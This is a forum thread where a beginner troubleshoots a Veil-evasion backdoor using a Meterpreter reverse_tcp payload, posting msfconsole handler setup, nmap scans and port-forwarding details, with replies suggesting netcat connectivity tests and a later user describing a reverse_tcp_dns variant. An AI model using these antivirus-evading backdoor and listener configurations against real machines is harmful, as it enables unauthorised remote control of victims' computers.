Jump to content

Metasploit backdoor over internet not working.


Caps

Recommended Posts

Hello , I am new to this forum but I think you guys can help me.

I am having trouble with metasploit over the intenet .

I have a backdoor with lhost: external ip and lport: 4444
My listener is just multi/handler with lhost: local ip and lport: 4444

I portforwarded the port 4444 on my router to my local ip .

2m6u7oh.png

To make my backdoor I use veil.

Hop you can help me !!!

Link to comment
Share on other sites

Well, all I can tell you is that based on your screenshot is that with this configuration in place if something on the internet wants to connect to you on port 4444 that will now work.

If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you.

That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell.

Link to comment
Share on other sites

Well, all I can tell you is that based on your screenshot is that with this configuration in place if something on the internet wants to connect to you on port 4444 that will now work.

If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you.

That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell.

Ok I will try to give you as many info as I can .

I run kali linux 2 on my laptop ThinkPas Edge , it is not a vm.

I am wireless connected to my router bbox 3 .

Here are my commands for my terminal listener :

root@kali:~# msfconsole

[-] Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "localhost" (::1) and accepting

TCP/IP connections on port 5432?

could not connect to server: Connection refused

Is the server running on host "localhost" (127.0.0.1) and accepting

TCP/IP connections on port 5432?

[-] WARNING! The following modules could not be loaded!

[-] /usr/share/metasploit-framework/modules/exploits/windows/25912.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/25912.rb:30: syntax error, unexpected tCONSTANT, expecting end-of-input

// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit

^

# cowsay++

____________

< metasploit >

------------

\ ,__,

\ (oo)____

(__) )\

||--|| *

Validate lots of vulnerabilities to demonstrate exposure

with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

=[ metasploit v4.11.4-2015071403 ]

+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]

+ -- --=[ 432 payloads - 37 encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.44

lhost => 192.168.1.44

msf exploit(handler) > set lport 4444

lport => 4444

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)

LHOST 192.168.1.44 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Wildcard Target

msf exploit(handler) > exploit -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.44:4444

[*] Starting the payload handler...

msf exploit(handler) >

I use veil-evasion for my backdoor .

The encoder I use :

35) python/shellcode_inject/base64_substitution

Shell code is msfvenom, payload is windows/meterpreter/reverse_tcp

LHOST: my external ip

LPORT: 4444

no extra msfvenom options

thats my backdoor.

I also did some nmaps:

on my local ip :

root@kali:~# nmap 192.168.1.44 -p 4444

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:58 BST

Nmap scan report for kali (192.168.1.44)

Host is up (0.00013s latency).

PORT STATE SERVICE

4444/tcp open krb524

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

on my router gateway:

root@kali:~# nmap 192.168.1.1 -p 4444

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:59 BST

Nmap scan report for mymodem (192.168.1.1)

Host is up (0.0032s latency).

PORT STATE SERVICE

4444/tcp closed krb524

MAC Address: 68:15:90:0C:2E:01 (Sagemcom SAS)

Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds

and on my public ip:

root@kali:~# nmap public ip -p 4444

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 13:00 BST

Nmap scan report for x.x.x.x.belgacom.be (public ip)

Host is up (0.0065s latency).

PORT STATE SERVICE

4444/tcp filtered krb524

Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

Here is my ifconfig on wlan:

root@kali:~# ifconfig wlan0

wlan0 Link encap:Ethernet HWaddr 74:e5:0b:0b:f6:a4

inet addr:192.168.1.44 Bcast:192.168.1.255 Mask:255.255.255.0

inet6 addr: 2a02:a03f:2c0a:e400:76e5:bff:fe0b:f6a4/64 Scope:Global

inet6 addr: fe80::76e5:bff:fe0b:f6a4/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:617656 errors:0 dropped:0 overruns:0 frame:0

TX packets:283680 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:546610500 (521.2 MiB) TX bytes:43580129 (41.5 MiB)

I think I gave you all I can, It says that I can't post until tomorow.

Edited by digininja
Removed potential public IP
Link to comment
Share on other sites

I think the problem is with your lhost which you're setting to your LAN IP. When the remote server wants to connect to you it will use that IP as a destination, which of course will make very little sense. You should specify your external IP (i.e. the outside IP of your router) and chances are things will work much better.

Link to comment
Share on other sites

I'd say your port forwarding is broken somewhere. Kill the metasploit stuff and start a basic listner on your macine with netcat then see if you can connect to it from outside, if you can't then the port forward is broken.

Link to comment
Share on other sites

Please Help me , I am still here .

If you want instant replies a forum isn't the best way to go, you might get it or it may take days for someone to reply. IRC is usually better if you can find a channel with someone skilled on it.

Link to comment
Share on other sites

So I think I got the port forward to work but I can't get a session , even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work .

And are there any sessions to be interacted with? Did the exploit run successfully? What do you see with:

"sessions -l" (-L lowercase)

Link to comment
Share on other sites

Yeah, basically the idea is that you test your exploit locally first so that once you try it over the internet the only thing that can go wrong is the connection. You'll know before-hand what you need to debug in case of problems.

Link to comment
Share on other sites

I'm going to ask this once more then leave, have you checked every step using netcat? Make sure that at each stage you can talk between the two machines. Start with nc doing both server and client then move to metasploit as the server and test again. That will show connectivity as the results from your first posts suggest that it is that that is causing at least part of the problem.

Link to comment
Share on other sites

So I did some nc I my listener is woking when I do a nc on my pc on my listener I get sending stage , how do I test it from my windows pc ?

I think that my pc blocks connections from outside.

EDIT:

I installed netcat on my windows when I try to do it I don't get any connections.

Edited by Caps
Link to comment
Share on other sites

when nc is running as a client it will be connecting out so doesn't matter about inbound connections.

Start at the localhost and connect to 4444 then do it from something else on the network, if they work then try it from something outside the network. If any fail you know where the blockage is.

Link to comment
Share on other sites

Nice now its working over lan, I want to try it over internet still the same problem.

For the configs of my backdoor and listener see above it is still the same but I will recap it :

Backdoor

lhost : my external ip

lport : 4444

Listener

lhost : my internal ip

lport : 4444

The port is open on my router , checked with an online checker .

Link to comment
Share on other sites

What are you using this backdoor for? Assuming it is legitimate reasons then you will have access to the target machine, try netcat from there. That will help prove whether it is the network or exploit that is at fault.

Link to comment
Share on other sites

  • 8 months later...

Hey guys .... Someone please help me, iam having a crisis and very desperate.. iam having exactly the same problem as Caps had and i tried to fix but failed .... my metasploit listener used to work previously and i got sessions but since i tried to attack my other system over the WAN NETWORK

Link to comment
Share on other sites

Hey guys .... Someone please help me, iam having a crisis and im very desperate.. iam having exactly the same problem as Caps had and i tried to fix but failed .... my metasploit listener used to work previously and i got sessions but since i tried to attack my other system over the WAN NETWORK ,Now i cant get a session on both  LAN and WAN ..

Iam on kali 2.0 sana ,for WAN , i used No-ip Dns for static pubilc ip .                                                                                                                                         

1. Created my backdoor

my payload is [ windows/meterpreter/reverse_tcp_dns ]

LHOST is my  [ hostname.ddns.net ]

LPORT IS  [ 4444 ] and i did port forwarding and also confirmed that the port is working on canyouseeme.org

2. Created a listener

i used the same payload  [ windows/meterpreter/reverse_tcp_dns ]

LHOST is my local ip address

and used the same port 4444 .

Caps IF YOU can read this please tell me how you did you resolve the problem.... Anyone,please provide me a SOLUTION.... Ill be glad, thx

0
  •  
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...